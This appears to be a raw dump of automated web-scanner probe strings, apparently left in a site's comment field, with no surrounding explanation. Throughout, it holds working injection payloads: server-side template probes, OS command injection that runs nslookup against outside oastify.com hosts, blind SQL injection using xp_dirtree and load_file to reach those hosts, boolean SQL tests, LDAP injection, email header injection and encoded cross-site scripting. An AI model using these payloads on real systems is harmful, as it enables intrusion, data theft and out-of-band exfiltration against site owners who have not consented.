h13n2#{390*440}ptn4g
qi5sr[[674*634]]rcfbz
e7d2s${file.separator}pxn5k
t6ji3%{165*611}xqioz
f63ty{{479|add:690}}s56oz
#set ($a=558*888) whra7${a}yp56j
rc3xdbmsi9
q2g5o
= 593*870
runsq{{.}}fkei3{{..}}xc0b6
jtqf3__${478*439}__vhlm9
COMMENT *}}l833o’/”<pjmyl
COMMENT *%}cmz48’/”<kpddn
COMMENT *r3rn7%>v9a04’/”<t6hc1
mpxbqw4zbuhmync09nbz
p2igjztlzu%419rwygelktp
8xmd6gi6nl\\lez05143qi
126a90o3oyAg5ypbo0r1h
126a90o3oyAg5ypbo0r1h
COMMENT *7rivs3da05n9h5460xdz
gvfh7lhddc0r3znq2h6zzhd2ftlm9fx7lz8pwe.oastify.com
http://4ty559f1b0yf1nle054nx5bqdhja73vtjl6bu0.oastify.com?COMMENT *
nslookup -q=cname k0llcpmhig5v83su7lb34li6kxqqej2c50xnnbc.oastify.com.&
COMMENT *|nslookup -q=cname pqjq2ucm8lv0y8izxq18uq8ba2gv4oskgc32rr.oastify.com.&
COMMENT *'”`0&nslookup -q=cname jaxkmowgsffui22thkl2eks5uw0poicf07nxbm.oastify.com.&`’
COMMENT *&nslookup -q=cname 8fo9rd15x4kjnr7im9qrj9xuzl5et7h25uskg9.oastify.com.&’\”`0&nslookup -q=cname 8fo9rd15x4kjnr7im9qrj9xuzl5et7h25uskg9.oastify.com.&`’
COMMENT *|echo m4ys1hitbv o118rudwgs||a #’ |echo m4ys1hitbv o118rudwgs||a #|” |echo m4ys1hitbv o118rudwgs||a #
COMMENT *&echo l3nnhzq3j2 j8r3z5wo3t&
COMMENT *”|echo jjdwqzs6f8 7h1u35q7qa ||
COMMENT *’|echo foziewk4lo l531o09t4v #xzwx
COMMENT *&ping -n 21 127.0.0.1&
v0rgjqhd84)(objectClass=*
476y72qpo3)(!(objectClass=*)
sltfachucd)(!(!(objectClass=*))
10r2f5dbbp)(!(!(!(objectClass=*)))
kve
COMMENT *]]>><
COMMENT *’+(function(){if(typeof ki3su===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);ki3su=1;}}())+'
“–>’–>`–>
COMMENT *
BCC:[email protected]
ccl: a
COMMENT *>
BCC:[email protected]
xbf: w
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
5gm6sa22y1lgoo8fn6rok6yr0i6bu4iwak27svh
COMMENT *
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %wdlmp;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %wdlmp;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\wddxp1ztvsi7lf56kxofhxvix932rvfm5axxnlc.oasti’+’fy.com\qhw’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\ao2b0fa766tlwtgkvbztsb6w8neg29q0ho9bzzo.oasti’+’fy.com\ufg’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\qztrbvlnhm4179r06ra93rhcj3pwdp1gt4lrbf0.oasti’+’fy.com\ivw’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\nulo6sgkcjzy26mx1o56yoc9e0kt8mwdp1ho7cw.oasti’+’fy.com\qdg’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\me4nqr0jwijxm56wlnp5inw8yz4sslgci0an0bp.oastify.com\\vgm’))
COMMENT *’+(select load_file(‘\\\\kj7lvp5h1govr3buqlu3nl163x9qxjlaoygl69v.oastify.com\\syj’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %eldfj;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %eldfj;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\betcqg08w7jmmu6llcpuicwxyo4hsag16pyco0d.oasti’+’fy.com\znw’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\4lq5x97130qftndes5wnp53q5hbaz3nuei65wtl.oasti’+’fy.com\xwr’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\w2zxe1otks77afu69xdf6xkim9s2gv4mwaoxel3.oasti’+’fy.com\yjm’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\a9kblfv7r6elht1kgbktdbrwtnzgn9b04owbmzb.oasti’+’fy.com\rbv’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\nb2onsxktjgyj63xiom6fot9v01tpmddf17oxcm.oastify.com\\bzx’))
COMMENT *’+(select load_file(‘\\\\3jn4v8501zoermbdq4umn41p3g99x2ltohg46sv.oastify.com\\nlv’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %suvnh;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %suvnh;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\w2zxe1otks77afu69xdf6xkim9s2gv4muamxcl1.oasti’+’fy.com\jxs’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\2ru337dz9ywdzljcy32lv39obfh851tskgc32rr.oasti’+’fy.com\imy’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\kqel2pch8gvvy3iuxl13ul86axgq4jsakycl29r.oasti’+’fy.com\xrb’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\f3jgfkpclb8qbyvpagey7gl1nstlhe55ytqgg45.oasti’+’fy.com\abn’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\s4xtgxqpmo93cbw2btfb8tmeo5uyir6i860tqhf.oastify.com\\kum’))
COMMENT *’+(select load_file(‘\\\\upnv1zbr7qu5xdh4wv0dtv7g97f03trku8mvcj1.oastify.com\\lkn’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %ubpdo;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ubpdo;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\yy0za3kvgu396hq85z9h2zgkibo4cx0oqciz8nx.oasti’+’fy.com\aut’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\pohq0uam6lt0w8gzvqz8sq6b82ev2oqfh39qzeo.oasti’+’fy.com\mid’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\lujm6qgichzw24mv1m54ymc7eykr8kwbozgm6av.oasti’+’fy.com\dls’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\zps014bw7vuaxih9w00it07l9cf53yrpkdc02or.oasti’+’fy.com\gfm’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\q90rlvvnrme1h910grk9drrct3zwnpbgd45rvfk.oastify.com\\dyg’))
COMMENT *’+(select load_file(‘\\\\heziqm0ewdjsm06rlip0iiw3yu4nsgg7jvbi16q.oastify.com\\ddh’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %zuhce;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %zuhce;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\0ef1q50xwwjbmj6al1pji1wmyd46szgq6ey1opd.oasti’+’fy.com\una’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\2ps317bz7yudxlhcw30lt37o9ff831rsiga30rp.oasti’+’fy.com\osb’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\01z1d5nxjw6b9jta81cj51jmldr6fz3qven1dp2.oasti’+’fy.com\vox’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\rlgsxw7o3nq2tad1sswaps3d54bxzqnhg58sygn.oasti’+’fy.com\zwe’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\7388fcp4l38ibqvha8eq78ltnktdh65x7lz8pwe.oastify.com\\jbz’))
COMMENT *’+(select load_file(‘\\\\cs8d4he9a8xn0vkmzd3vwdaycpii6bu2xqpdf14.oastify.com\\dib’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %pnwqj;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %pnwqj;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\9y8aaek6g53k6sqj5a9s2agvimofc80zqnia8yx.oasti’+’fy.com\bde’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\yoqz03av6ut9whg8vzzhsz6k8be42xqohc9zzno.oasti’+’fy.com\ntq’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\o9ypltvlrkezh71ygpk7dprat1zunnbe32vplda.oasti’+’fy.com\nza’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\do5e0iaa69towwgnvezwse6z8qej2cq3jrbe12q.oasti’+’fy.com\rba’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\u72vjztrpqc5fdz4evidbvpgr7x0lt9kb83vtji.oastify.com\\opz’))
COMMENT *’+(select load_file(‘\\\\n4sogsqkmj9yc6wxbof68om9o0utim6d911orcg.oastify.com\\itb’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %wpskv;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %wpskv;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\1hj2t63yzxmcpk9bo2skl2zn1e77v0jr9f12rqg.oasti’+’fy.com\naq’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\bu9c6gg8c7zm2uml1c5uyccxeokh8aw1npfc50u.oasti’+’fy.com\jtu’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\ydfzp3zvvui9lh58kzohhzvkxb34rxfo7czzpne.oasti’+’fy.com\fom’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\dhyeti3az9mopw9noeswlezz1q7jvcj3cr4eu2j.oasti’+’fy.com\vba’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\2333f7pzly8dblvca3el73lonft8h15s7gz3pre.oastify.com\\ngv’))
COMMENT *’+(select load_file(‘\\\\em4fyj8b4arpuxeotfxxqf406rck0do4rsjf93y.oastify.com\\blr’))+’
COMMENT *21088350′ or ‘4493’=’4493
COMMENT *47282250′ or ‘9356’=’9363
COMMENT *55386879′ or ‘4550’=’4550
COMMENT *24473041′ or ‘4279’=’4279′
COMMENT *98994022′ or 8268=8268–
COMMENT *99436274′ or 9480=9483–
COMMENT *32775002′ or 5292=5292–
COMMENT *57078813′ or 2274=2274′–
COMMENT *’ and ‘6748’=’6748
COMMENT *’ and ‘1651’=’1653
COMMENT *’ and ‘3477’=’3477
COMMENT *’ and ‘3321’=’3321′
COMMENT *’ and 1573=1573–
COMMENT *’ and 2299=2302–
COMMENT *’ and 1587=1587–
COMMENT *’ and 9099=9099′–
mjjh3lb85h
COMMENT *1afub0wyx5
qmfmhom1usphepxl35e0
vocreirsl6%41l4y9vm2sot
tiz2muk25a\\l67a1x4p7q
npvpbbfdq4Al1zc6nu9o8
npvpbbfdq4Al1zc6nu9o8
COMMENT *0vkdhxonh2ay6qqvawp8
COMMENT *xai7vafa6u%41j824qfmppq
COMMENT *3pguwnmmdg\\lhqcy48w95
COMMENT *331o9tmdm0A1m2p16xl1y
COMMENT *331o9tmdm0A1m2p16xl1y
COMMENT *s0e56t0cy6
COMMENT *rd358alert(1)f4zkl
COMMENT *rd358alert(1)f4zkl
COMMENT *rd358%3cscript%3ealert%281%29%3c%2fscript%3ef4zkl
COMMENT *rd358alert(1)f4zkl
COMMENT *x2yt0alert(1)q1mw3
COMMENT *x2yt0alert(1)q1mw3
COMMENT *x2yt0%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eq1mw3
COMMENT *x2yt0alert(1)q1mw3
COMMENT *cjf0fm832r
COMMENT *cjf0fm832r
COMMENT *cjf0f%3ca%20b%3dc%3em832r
COMMENT *cjf0fm832r
(select extractvalue(xmltype(‘<!DOCTYPE root [ %bmnhz;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %bmnhz;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\g1ihdlndjc6r9ztq8hcz5hj2ltrmff36tulhb50.oasti’+’fy.com\rpc’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\k4plgpqhmg9vc3wublf38lm6oxuqij6axyplf94.oasti’+’fy.com\huq’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\m8vnkrujqidxg50wfnj5cnq8szysmlac20unkb9.oasti’+’fy.com\fuo’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\syutaxkpgo336bq25t9b2tgei5oycr0it6ltbh0.oasti’+’fy.com\aee’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\bq5c2gc887vmyuilxc1uuc8xaogh4as1upmcc01.oastify.com\\okg’))
COMMENT *’+(select load_file(‘\\\\syutaxkpgo336bq25t9b2tgei5oycr0i36vtlha.oastify.com\\ggt’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %yuach;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %yuach;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\3jn4v8501zoermbdq4umn41p3g99x2ltbh34tsi.oasti’+’fy.com\ftm’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\fatgmkwcsbfqiy2phglyegs1us0loec53tvgl4a.oasti’+’fy.com\vjd’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\yikzu34v0un9qha8pzthmz0k2b84wxkocc4zunj.oasti’+’fy.com\pmp’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\6bi7nbx3t2ghjp3gi7mpf7tsvj1cp5dw6ky7ovd.oasti’+’fy.com\ppe’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\vlkwx07s3rq6ted5swwepw3h58b1zunlp9hw7kw.oastify.com\\tjd’))
COMMENT *’+(select load_file(‘\\\\oogp0tal6ktzw7gyvpz7sp6a81eu2nqet2lpbd0.oastify.com\\zph’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %txism;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %txism;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\nxoo9sjkfj2y56px4o861of9h0ntbmzdp1ho7cw.oasti’+’fy.com\qah’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\nneozs9k5jsyv6fxuoy6ro5970dt1mpdg18oycn.oasti’+’fy.com\oao’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\5rx63ad291wgzojfy62ov69rbihb54tvljd63us.oasti’+’fy.com\tyn’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\j8skkougqfdug20tfkj2ckq5swypmia93xvkl8a.oasti’+’fy.com\nlh’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\bbqcngx8t7gmju3licmufctxvo1hpad1fp7cx0m.oastify.com\\teb’))
COMMENT *’+(select load_file(‘\\\\ie0jqn0fwejtm16sljp1ijw4yv4oshg8jwbj17q.oastify.com\\iwp’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %lkgsb;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %lkgsb;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\7ck8ocy4u3hikq4hj8nqg8utwk2dq6ex4lw8mwb.oasti’+’fy.com\sbb’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\bbqcngx8t7gmju3licmufctxvo1hpad14pwcm0b.oasti’+’fy.com\mgi’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\zwz084iwev1a4io9307i00elgcm5ayypqdi08ox.oasti’+’fy.com\fdw’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\cuad6hg9c8zn2vmm1d5vydcyepki8bw2pqhd71w.oasti’+’fy.com\arx’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\2kn3w76z2ypdslccr3vlo32o4fa8y1msogg36rv.oastify.com\\ecf’))
COMMENT *’+(select load_file(‘\\\\2or307az6ytdwlgcv3zls36o8fe821qstgl3br0.oastify.com\\jsn’))+’
‘”>
javascript:/*
COMMENT *
COMMENT *
COMMENT *